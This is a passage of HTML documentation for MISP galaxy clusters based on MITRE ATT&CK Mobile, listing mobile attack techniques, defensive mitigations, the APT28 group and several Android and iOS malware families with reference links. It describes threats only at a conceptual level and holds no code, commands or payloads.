<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://securityintelligence.com/android-vulnerabilities-attacking-nexus-6-and-6p-custom-boot-modes/">https://securityintelligence.com/android-vulnerabilities-attacking-nexus-6-and-6p-custom-boot-modes/</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_manipulate_device_communication_mob_t1066"><a class="anchor" href="#_manipulate_device_communication_mob_t1066"></a><a class="link" href="#_manipulate_device_communication_mob_t1066">Manipulate Device Communication - MOB-T1066</a></h3>
<div class="paragraph">
<p>If network traffic between the mobile device and a remote server is not securely protected, then an attacker positioned on the network may be able to manipulate network communication without being detected. For example, FireEye researchers found in 2014 that 68% of the top 1,000 free applications in the Google Play Store had at least one Transport Layer Security (TLS) implementation vulnerability potentially opening the applications' network traffic to man-in-the-middle attacks (Citation: FireEye-SSL).</p>
</div>
<div class="paragraph">
<p>Platforms: Android, iOS</p>
</div>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 1413. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://attack.mitre.org/mobile/index.php/Technique/MOB-T1066">https://attack.mitre.org/mobile/index.php/Technique/MOB-T1066</a></p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://pages.nist.gov/mobile-threat-catalogue/application-threats/APP-1.html">https://pages.nist.gov/mobile-threat-catalogue/application-threats/APP-1.html</a></p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://www.fireeye.com/blog/threat-research/2014/08/ssl-vulnerabilities-who-listens-when-android-applications-talk.html">https://www.fireeye.com/blog/threat-research/2014/08/ssl-vulnerabilities-who-listens-when-android-applications-talk.html</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_rogue_cellular_base_station_mob_t1070"><a class="anchor" href="#_rogue_cellular_base_station_mob_t1070"></a><a class="link" href="#_rogue_cellular_base_station_mob_t1070">Rogue Cellular Base Station - MOB-T1070</a></h3>
<div class="paragraph">
<p>An adversary could set up a rogue cellular base station and then use it to eavesdrop on or manipulate cellular device communication. For example, Ritter and DePerry of iSEC Partners demonstrated this technique using a compromised cellular femtocell at Black Hat USA 2013 (Citation: Computerworld-Femtocell).</p>
</div>
<div class="paragraph">
<p>Platforms: Android, iOS</p>
</div>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 1414. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://attack.mitre.org/mobile/index.php/Technique/MOB-T1070">https://attack.mitre.org/mobile/index.php/Technique/MOB-T1070</a></p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://pages.nist.gov/mobile-threat-catalogue/cellular-threats/CEL-7.html">https://pages.nist.gov/mobile-threat-catalogue/cellular-threats/CEL-7.html</a></p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="http://www.computerworld.com/article/2484538/cybercrime-hacking/researchers-exploit-cellular-tech-flaws-to-intercept-phone-calls.html">http://www.computerworld.com/article/2484538/cybercrime-hacking/researchers-exploit-cellular-tech-flaws-to-intercept-phone-calls.html</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_repackaged_application_mob_t1047"><a class="anchor" href="#_repackaged_application_mob_t1047"></a><a class="link" href="#_repackaged_application_mob_t1047">Repackaged Application - MOB-T1047</a></h3>
<div class="paragraph">
<p>An adversary could download a legitimate app, disassemble it, add malicious code, and then reassemble the app, for example as described by (Citation: Zhou) and Jiang in (Citation: Zhou). The app would appear to be the original app but contain additional malicious functionality. The adversary could then publish this app to app stores or use another delivery technique.</p>
</div>
<div class="paragraph">
<p>Detection: An EMM/MDM or mobile threat protection solution can identify the presence of unwanted, known insecure, or malicious apps on devices.</p>
</div>
<div class="paragraph">
<p>Platforms: Android, iOS</p>
</div>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 1415. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://attack.mitre.org/mobile/index.php/Technique/MOB-T1047">https://attack.mitre.org/mobile/index.php/Technique/MOB-T1047</a></p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://pages.nist.gov/mobile-threat-catalogue/application-threats/APP-14.html">https://pages.nist.gov/mobile-threat-catalogue/application-threats/APP-14.html</a></p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="http://ieeexplore.ieee.org/document/6234407">http://ieeexplore.ieee.org/document/6234407</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_lock_user_out_of_device_mob_t1049"><a class="anchor" href="#_lock_user_out_of_device_mob_t1049"></a><a class="link" href="#_lock_user_out_of_device_mob_t1049">Lock User Out of Device - MOB-T1049</a></h3>
<div class="paragraph">
<p>An adversary may seek to lock the legitimate user out of the device, for example until a ransom is paid.</p>
</div>
<div class="paragraph">
<p>On Android versions prior to 7, apps can abuse Device Administrator access to reset the device lock passcode to lock the user out of the device.</p>
</div>
<div class="paragraph">
<p>On iOS devices, this technique does not work because mobile device management servers can only remove the screen lock passcode, they cannot set a new passcode. However, on jailbroken devices, malware has been demonstrated that can lock the user out of the device (Citation: KeyRaider).</p>
</div>
<div class="paragraph">
<p>Platforms: Android, iOS</p>
</div>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 1416. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://attack.mitre.org/mobile/index.php/Technique/MOB-T1049">https://attack.mitre.org/mobile/index.php/Technique/MOB-T1049</a></p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://pages.nist.gov/mobile-threat-catalogue/application-threats/APP-28.html">https://pages.nist.gov/mobile-threat-catalogue/application-threats/APP-28.html</a></p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="http://researchcenter.paloaltonetworks.com/2015/08/keyraider-ios-malware-steals-over-225000-apple-accounts-to-create-free-app-utopia/">http://researchcenter.paloaltonetworks.com/2015/08/keyraider-ios-malware-steals-over-225000-apple-accounts-to-create-free-app-utopia/</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_malicious_software_development_tools_mob_t1065"><a class="anchor" href="#_malicious_software_development_tools_mob_t1065"></a><a class="link" href="#_malicious_software_development_tools_mob_t1065">Malicious Software Development Tools - MOB-T1065</a></h3>
<div class="paragraph">
<p>As demonstrated by the XcodeGhost attack (Citation: PaloAlto-XcodeGhost1), app developers could be provided with modified versions of software development tools (e.g. compilers) that automatically inject malicious or exploitable code into applications.</p>
</div>
<div class="paragraph">
<p>Detection: Enterprises could deploy integrity checking software to the computers that they use to develop code to detect presence of unauthorized, modified software development tools.</p>
</div>
<div class="paragraph">
<p>Platforms: Android, iOS</p>
</div>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 1417. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://attack.mitre.org/mobile/index.php/Technique/MOB-T1065">https://attack.mitre.org/mobile/index.php/Technique/MOB-T1065</a></p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="http://researchcenter.paloaltonetworks.com/2015/09/novel-malware-xcodeghost-modifies-xcode-infects-apple-ios-apps-and-hits-app-store/">http://researchcenter.paloaltonetworks.com/2015/09/novel-malware-xcodeghost-modifies-xcode-infects-apple-ios-apps-and-hits-app-store/</a></p></td>
</tr>
</tbody>
</table>
</div>
</div>
</div>
<div class="sect1">
<h2 id="_mobile_attack_course_of_action"><a class="anchor" href="#_mobile_attack_course_of_action"></a><a class="link" href="#_mobile_attack_course_of_action">Mobile Attack - Course of Action</a></h2>
<div class="sectionbody">
<div class="paragraph">
<p>ATT&amp;CK Mitigation.</p>
</div>
<div class="admonitionblock note">
<table>
<tr>
<td class="icon">
<i class="fa icon-note" title="Note"></i>
</td>
<td class="content">
Mobile Attack - Course of Action is a cluster galaxy available in JSON format at <a href="https://github.com/MISP/misp-galaxy/blob/master/clusters/mobile" class="bare">https://github.com/MISP/misp-galaxy/blob/master/clusters/mobile</a> attack - course of action.json[<strong>this location</strong>] The JSON format can be freely reused in your application or automatically enabled in <a href="https://www.github.com/MISP/MISP">MISP</a>.
</td>
</tr>
</table>
</div>
<div class="dlist">
<dl>
<dt class="hdlist1">authors</dt>
<dd>
<p>MITRE</p>
</dd>
</dl>
</div>
<div class="sect2">
<h3 id="_deploy_compromised_device_detection_method_mob_m1010"><a class="anchor" href="#_deploy_compromised_device_detection_method_mob_m1010"></a><a class="link" href="#_deploy_compromised_device_detection_method_mob_m1010">Deploy Compromised Device Detection Method - MOB-M1010</a></h3>
<div class="paragraph">
<p>A variety of methods exist that can be used to enable enterprises to identify compromised (e.g. rooted/jailbroken) devices, whether using security mechanisms built directly into the device, third-party mobile security applications, enterprise mobility management (EMM)/mobile device management (MDM) capabilities, or other methods. Some methods may be trivial to evade while others may be more sophisticated.</p>
</div>
</div>
<div class="sect2">
<h3 id="_interconnection_filtering_mob_m1014"><a class="anchor" href="#_interconnection_filtering_mob_m1014"></a><a class="link" href="#_interconnection_filtering_mob_m1014">Interconnection Filtering - MOB-M1014</a></h3>
<div class="paragraph">
<p>In order to mitigate Signaling System 7 (SS7) exploitation, the Communications, Security, Reliability, and Interoperability Council (CSRIC) describes filtering interconnections between network operators to block inappropriate requests (Citation: CSRIC5-WG10-FinalReport).</p>
</div>
</div>
<div class="sect2">
<h3 id="_use_device_provided_credential_storage_mob_m1008"><a class="anchor" href="#_use_device_provided_credential_storage_mob_m1008"></a><a class="link" href="#_use_device_provided_credential_storage_mob_m1008">Use Device-Provided Credential Storage - MOB-M1008</a></h3>
<div class="paragraph">
<p>Application developers should use device-provided credential storage mechanisms such as Android&#8217;s KeyStore or iOS&#8217;s KeyChain. These can prevent credentials from being exposed to an adversary.</p>
</div>
</div>
<div class="sect2">
<h3 id="_use_recent_os_version_mob_m1006"><a class="anchor" href="#_use_recent_os_version_mob_m1006"></a><a class="link" href="#_use_recent_os_version_mob_m1006">Use Recent OS Version - MOB-M1006</a></h3>
<div class="paragraph">
<p>New mobile operating system versions bring not only patches against discovered vulnerabilities but also often bring security architecture improvements that provide resilience against potential vulnerabilities or weaknesses that have not yet been discovered. They may also bring improvements that block use of observed adversary techniques.</p>
</div>
</div>
<div class="sect2">
<h3 id="_security_updates_mob_m1001"><a class="anchor" href="#_security_updates_mob_m1001"></a><a class="link" href="#_security_updates_mob_m1001">Security Updates - MOB-M1001</a></h3>
<div class="paragraph">
<p>Install security updates in response to discovered vulnerabilities.</p>
</div>
<div class="paragraph">
<p>Purchase devices with a vendor and/or mobile carrier commitment to provide security updates in a prompt manner for a set period of time.</p>
</div>
<div class="paragraph">
<p>Decommission devices that will no longer receive security updates.</p>
</div>
<div class="paragraph">
<p>Limit or block access to enterprise resources from devices that have not installed recent security updates.
* On Android devices, access can be controlled based on each device&#8217;s security patch level.
* On iOS devices, access can be controlled based on the iOS version.</p>
</div>
</div>
<div class="sect2">
<h3 id="_lock_bootloader_mob_m1003"><a class="anchor" href="#_lock_bootloader_mob_m1003"></a><a class="link" href="#_lock_bootloader_mob_m1003">Lock Bootloader - MOB-M1003</a></h3>
<div class="paragraph">
<p>On devices that provide the capability to unlock the bootloader (hence allowing any operating system code to be flashed onto the device), perform periodic checks to ensure that the bootloader is locked.</p>
</div>
</div>
<div class="sect2">
<h3 id="_system_partition_integrity_mob_m1004"><a class="anchor" href="#_system_partition_integrity_mob_m1004"></a><a class="link" href="#_system_partition_integrity_mob_m1004">System Partition Integrity - MOB-M1004</a></h3>
<div class="paragraph">
<p>Ensure that Android devices being used include and enable the Verified Boot capability, which cryptographically ensures the integrity of the system partition.</p>
</div>
</div>
<div class="sect2">
<h3 id="_attestation_mob_m1002"><a class="anchor" href="#_attestation_mob_m1002"></a><a class="link" href="#_attestation_mob_m1002">Attestation - MOB-M1002</a></h3>
<div class="paragraph">
<p>Enable remote attestation capabilities when available (such as Android SafetyNet or Samsung Knox TIMA Attestation) and prohibit devices that fail the attestation from accessing enterprise resources.</p>
</div>
</div>
<div class="sect2">
<h3 id="_caution_with_device_administrator_access_mob_m1007"><a class="anchor" href="#_caution_with_device_administrator_access_mob_m1007"></a><a class="link" href="#_caution_with_device_administrator_access_mob_m1007">Caution with Device Administrator Access - MOB-M1007</a></h3>
<div class="paragraph">
<p>Warn device users not to accept requests to grant Device Administrator access to applications without good reason.</p>
</div>
<div class="paragraph">
<p>Additionally, application vetting should include a check on whether the application requests Device Administrator access. Applications that do request Device Administrator access should be carefully scrutinized and only allowed to be used if a valid reason exists.</p>
</div>
</div>
<div class="sect2">
<h3 id="_application_developer_guidance_mob_m1013"><a class="anchor" href="#_application_developer_guidance_mob_m1013"></a><a class="link" href="#_application_developer_guidance_mob_m1013">Application Developer Guidance - MOB-M1013</a></h3>
<div class="paragraph">
<p>This mitigation describes any guidance or training given to developers of applications to avoid introducing security weaknesses that an adversary may be able to take advantage of.</p>
</div>
</div>
<div class="sect2">
<h3 id="_application_vetting_mob_m1005"><a class="anchor" href="#_application_vetting_mob_m1005"></a><a class="link" href="#_application_vetting_mob_m1005">Application Vetting - MOB-M1005</a></h3>
<div class="paragraph">
<p>Enterprises can vet applications for exploitable vulnerabilities or unwanted (privacy-invasive or malicious) behaviors. Enterprises can inspect applications themselves or use a third-party service.</p>
</div>
<div class="paragraph">
<p>Enterprises may impose policies to only allow pre-approved applications to be installed on their devices or may impose policies to block use of specific applications known to have issues. In Bring Your Own Device (BYOD) environments, enterprises may only be able to impose these policies over an enterprise-managed portion of the device.</p>
</div>
<div class="paragraph">
<p>Application Vetting is not a complete mitigation. Techniques such as Detect App Analysis Environment exist that can enable adversaries to bypass vetting.</p>
</div>
</div>
<div class="sect2">
<h3 id="_user_guidance_mob_m1011"><a class="anchor" href="#_user_guidance_mob_m1011"></a><a class="link" href="#_user_guidance_mob_m1011">User Guidance - MOB-M1011</a></h3>
<div class="paragraph">
<p>Describes any guidance or training given to users to set particular configuration settings or avoid specific potentially risky behaviors.</p>
</div>
</div>
<div class="sect2">
<h3 id="_enterprise_policy_mob_m1012"><a class="anchor" href="#_enterprise_policy_mob_m1012"></a><a class="link" href="#_enterprise_policy_mob_m1012">Enterprise Policy - MOB-M1012</a></h3>
<div class="paragraph">
<p>An enterprise mobility management (EMM), also known as mobile device management (MDM), system can be used to provision policies to mobile devices to control aspects of their allowed behavior.</p>
</div>
</div>
<div class="sect2">
<h3 id="_encrypt_network_traffic_mob_m1009"><a class="anchor" href="#_encrypt_network_traffic_mob_m1009"></a><a class="link" href="#_encrypt_network_traffic_mob_m1009">Encrypt Network Traffic - MOB-M1009</a></h3>
<div class="paragraph">
<p>Application developers should encrypt all of their application network traffic using the Transport Layer Security (TLS) protocol to ensure protection of sensitive data and deter network-based attacks. If desired, application developers could perform message-based encryption of data before passing it for TLS encryption.</p>
</div>
<div class="paragraph">
<p>iOS&#8217;s App Transport Security feature can be used to help ensure that all application network traffic is appropriately protected. Apple intends to mandate use of App Transport Security (Citation: TechCrunch-ATS) for all apps in the Apple App Store unless appropriate justification is given.</p>
</div>
<div class="paragraph">
<p>Android&#8217;s Network Security Configuration feature similarly can be used by app developers to help ensure that all of their application network traffic is appropriately protected (Citation: Android-NetworkSecurityConfig).</p>
</div>
<div class="paragraph">
<p>Use of Virtual Private Network (VPN) tunnels, e.g. using the IPsec protocol, can help mitigate some types of network attacks as well.</p>
</div>
</div>
</div>
</div>
<div class="sect1">
<h2 id="_mobile_attack_intrusion_set"><a class="anchor" href="#_mobile_attack_intrusion_set"></a><a class="link" href="#_mobile_attack_intrusion_set">Mobile Attack - intrusion Set</a></h2>
<div class="sectionbody">
<div class="paragraph">
<p>Name of ATT&amp;CK Group.</p>
</div>
<div class="admonitionblock note">
<table>
<tr>
<td class="icon">
<i class="fa icon-note" title="Note"></i>
</td>
<td class="content">
Mobile Attack - intrusion Set is a cluster galaxy available in JSON format at <a href="https://github.com/MISP/misp-galaxy/blob/master/clusters/mobile" class="bare">https://github.com/MISP/misp-galaxy/blob/master/clusters/mobile</a> attack - intrusion set.json[<strong>this location</strong>] The JSON format can be freely reused in your application or automatically enabled in <a href="https://www.github.com/MISP/MISP">MISP</a>.
</td>
</tr>
</table>
</div>
<div class="dlist">
<dl>
<dt class="hdlist1">authors</dt>
<dd>
<p>MITRE</p>
</dd>
</dl>
</div>
<div class="sect2">
<h3 id="_apt28_g0007_2"><a class="anchor" href="#_apt28_g0007_2"></a><a class="link" href="#_apt28_g0007_2">APT28 - G0007</a></h3>
<div class="paragraph">
<p>APT28 is a threat group that has been attributed to the Russian government. (Citation: FireEye APT28) (Citation: SecureWorks TG-4127) (Citation: FireEye APT28) January 2017 (Citation: GRIZZLY STEPPE JAR) This group reportedly compromised the Democratic National Committee in April 2016. (Citation: Crowdstrike DNC June 2016)</p>
</div>
<div class="paragraph">
<p>APT28 - G0007 is also known as:</p>
</div>
<div class="ulist">
<ul>
<li>
<p>APT28</p>
</li>
<li>
<p>Sednit</p>
</li>
<li>
<p>Sofacy</p>
</li>
<li>
<p>Pawn Storm</p>
</li>
<li>
<p>Fancy Bear</p>
</li>
<li>
<p>STRONTIUM</p>
</li>
<li>
<p>Tsar Team</p>
</li>
<li>
<p>Threat Group-4127</p>
</li>
<li>
<p>TG-4127</p>
</li>
</ul>
</div>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 1418. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://attack.mitre.org/wiki/Group/G0007">https://attack.mitre.org/wiki/Group/G0007</a></p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://www.crowdstrike.com/blog/bears-midst-intrusion-democratic-national-committee/">https://www.crowdstrike.com/blog/bears-midst-intrusion-democratic-national-committee/</a></p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://www.fireeye.com/content/dam/fireeye-www/global/en/current-threats/pdfs/rpt-apt28.pdf">https://www.fireeye.com/content/dam/fireeye-www/global/en/current-threats/pdfs/rpt-apt28.pdf</a></p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://www.secureworks.com/research/threat-group-4127-targets-hillary-clinton-presidential-campaign">https://www.secureworks.com/research/threat-group-4127-targets-hillary-clinton-presidential-campaign</a></p></td>
</tr>
</tbody>
</table>
</div>
</div>
</div>
<div class="sect1">
<h2 id="_mobile_attack_malware"><a class="anchor" href="#_mobile_attack_malware"></a><a class="link" href="#_mobile_attack_malware">Mobile Attack - Malware</a></h2>
<div class="sectionbody">
<div class="paragraph">
<p>Name of ATT&amp;CK software.</p>
</div>
<div class="admonitionblock note">
<table>
<tr>
<td class="icon">
<i class="fa icon-note" title="Note"></i>
</td>
<td class="content">
Mobile Attack - Malware is a cluster galaxy available in JSON format at <a href="https://github.com/MISP/misp-galaxy/blob/master/clusters/mobile" class="bare">https://github.com/MISP/misp-galaxy/blob/master/clusters/mobile</a> attack - malware.json[<strong>this location</strong>] The JSON format can be freely reused in your application or automatically enabled in <a href="https://www.github.com/MISP/MISP">MISP</a>.
</td>
</tr>
</table>
</div>
<div class="dlist">
<dl>
<dt class="hdlist1">authors</dt>
<dd>
<p>MITRE</p>
</dd>
</dl>
</div>
<div class="sect2">
<h3 id="_androrat_mob_s0008"><a class="anchor" href="#_androrat_mob_s0008"></a><a class="link" href="#_androrat_mob_s0008">AndroRAT - MOB-S0008</a></h3>
<div class="paragraph">
<p>AndroRAT "allows a third party to control the device and collect information such as contacts, call logs, text messages, device location, and audio from the microphone. It is now used maliciously by other actors." (Citation: Lookout-EnterpriseApps)</p>
</div>
<div class="paragraph">
<p>Aliases: AndroRAT</p>
</div>
<div class="paragraph">
<p>AndroRAT - MOB-S0008 is also known as:</p>
</div>
<div class="ulist">
<ul>
<li>
<p>AndroRAT</p>
</li>
</ul>
</div>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 1419. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://attack.mitre.org/mobile/index.php/Software/MOB-S0008">https://attack.mitre.org/mobile/index.php/Software/MOB-S0008</a></p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://blog.lookout.com/blog/2016/05/25/spoofed-apps/">https://blog.lookout.com/blog/2016/05/25/spoofed-apps/</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_trojan_sms_androidos_agent_ao_mob_s0023"><a class="anchor" href="#_trojan_sms_androidos_agent_ao_mob_s0023"></a><a class="link" href="#_trojan_sms_androidos_agent_ao_mob_s0023">Trojan-SMS.AndroidOS.Agent.ao - MOB-S0023</a></h3>
<div class="paragraph">
<p>Android malware described by Kaspersky (Citation: Kaspersky-MobileMalware).</p>
</div>
<div class="paragraph">
<p>Aliases: Trojan-SMS.AndroidOS.Agent.ao</p>
</div>
<div class="paragraph">
<p>Trojan-SMS.AndroidOS.Agent.ao - MOB-S0023 is also known as:</p>
</div>
<div class="ulist">
<ul>
<li>
<p>Trojan-SMS.AndroidOS.Agent.ao</p>
</li>
</ul>
</div>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 1420. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://attack.mitre.org/mobile/index.php/Software/MOB-S0023">https://attack.mitre.org/mobile/index.php/Software/MOB-S0023</a></p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://securelist.com/analysis/kaspersky-security-bulletin/58335/mobile-malware-evolution-2013/">https://securelist.com/analysis/kaspersky-security-bulletin/58335/mobile-malware-evolution-2013/</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_dualtoy_mob_s0031"><a class="anchor" href="#_dualtoy_mob_s0031"></a><a class="link" href="#_dualtoy_mob_s0031">DualToy - MOB-S0031</a></h3>
<div class="paragraph">
<p>DualToy is Windows malware that installs malicious applications onto Android and iOS devices connected over USB (Citation: PaloAlto-DualToy).</p>
</div>
<div class="paragraph">
<p>Aliases: DualToy</p>
</div>
<div class="paragraph">
<p>DualToy - MOB-S0031 is also known as:</p>
</div>
<div class="ulist">
<ul>
<li>
<p>DualToy</p>
</li>
</ul>
</div>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 1421. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://attack.mitre.org/mobile/index.php/Software/MOB-S0031">https://attack.mitre.org/mobile/index.php/Software/MOB-S0031</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_keyraider_mob_s0004"><a class="anchor" href="#_keyraider_mob_s0004"></a><a class="link" href="#_keyraider_mob_s0004">KeyRaider - MOB-S0004</a></h3>
<div class="paragraph">
<p>On jailbroken iOS devices, (Citation: KeyRaider) steals Apple account credentials and other data. It "also has built-in functionality to hold iOS devices for ransom." (Citation: KeyRaider)</p>
</div>
<div class="paragraph">
<p>Aliases: (Citation: KeyRaider)</p>
</div>
<div class="paragraph">
<p>KeyRaider - MOB-S0004 is also known as:</p>
</div>
<div class="ulist">
<ul>
<li>
<p>KeyRaider</p>
</li>
</ul>
</div>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 1422. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://attack.mitre.org/mobile/index.php/Software/MOB-S0004">https://attack.mitre.org/mobile/index.php/Software/MOB-S0004</a></p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="http://researchcenter.paloaltonetworks.com/2015/08/keyraider-ios-malware-steals-over-225000-apple-accounts-to-create-free-app-utopia/">http://researchcenter.paloaltonetworks.com/2015/08/keyraider-ios-malware-steals-over-225000-apple-accounts-to-create-free-app-utopia/</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_braintest_mob_s0009"><a class="anchor" href="#_braintest_mob_s0009"></a><a class="link" href="#_braintest_mob_s0009">BrainTest - MOB-S0009</a></h3>
<div class="paragraph">
<p>Brain Test is a family of Android malware described by CheckPoint (Citation: CheckPoint-BrainTest) and Lookout (Citation: Lookout-BrainTest).</p>
</div>
<div class="paragraph">
<p>Aliases: BrainTest</p>
</div>
<div class="paragraph">
<p>BrainTest - MOB-S0009 is also known as:</p>
</div>
<div class="ulist">
<ul>
<li>
<p>BrainTest</p>
</li>
</ul>
</div>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 1423. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://attack.mitre.org/mobile/index.php/Software/MOB-S0009">https://attack.mitre.org/mobile/index.php/Software/MOB-S0009</a></p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="http://blog.checkpoint.com/2015/09/21/braintest-a-new-level-of-sophistication-in-mobile-malware/">http://blog.checkpoint.com/2015/09/21/braintest-a-new-level-of-sophistication-in-mobile-malware/</a></p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://blog.lookout.com/blog/2016/01/06/brain-test-re-emerges/">https://blog.lookout.com/blog/2016/01/06/brain-test-re-emerges/</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_shedun_mob_s0010"><a class="anchor" href="#_shedun_mob_s0010"></a><a class="link" href="#_shedun_mob_s0010">Shedun - MOB-S0010</a></h3>
<div class="paragraph">
<p>Lookout states that some variants of the Shedun, Shuanet, and ShiftyBug/Kemoge Android malware families "have 71 percent to 82 percent code similarity" (Citation: Lookout-Adware), even though they "dont believe these apps were all created by the same author or group".</p>
</div>
<div class="paragraph">
<p>Aliases: Shedun, Shuanet, ShiftyBug, Kemoge</p>
</div>
<div class="paragraph">
<p>Shedun - MOB-S0010 is also known as:</p>
</div>
<div class="ulist">
<ul>
<li>
<p>Shedun</p>
</li>
<li>
<p>Shuanet</p>
</li>
<li>
<p>ShiftyBug</p>
</li>
<li>
<p>Kemoge</p>
</li>
</ul>
</div>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 1424. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://attack.mitre.org/mobile/index.php/Software/MOB-S0010">https://attack.mitre.org/mobile/index.php/Software/MOB-S0010</a></p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://blog.lookout.com/blog/2015/11/04/trojanized-adware/">https://blog.lookout.com/blog/2015/11/04/trojanized-adware/</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_dresscode_mob_s0016"><a class="anchor" href="#_dresscode_mob_s0016"></a><a class="link" href="#_dresscode_mob_s0016">DressCode - MOB-S0016</a></h3>
<div class="paragraph">
<p>Android malware family analyzed by Trend Micro (Citation: TrendMicro-DressCode)</p>
</div>
<div class="paragraph">
<p>Aliases: DressCode</p>
</div>
<div class="paragraph">
<p>DressCode - MOB-S0016 is also known as:</p>
</div>
<div class="ulist">
<ul>
<li>
<p>DressCode</p>
</li>
</ul>
</div>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 1425. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://attack.mitre.org/mobile/index.php/Software/MOB-S0016">https://attack.mitre.org/mobile/index.php/Software/MOB-S0016</a></p></td>
</tr>
<tr>
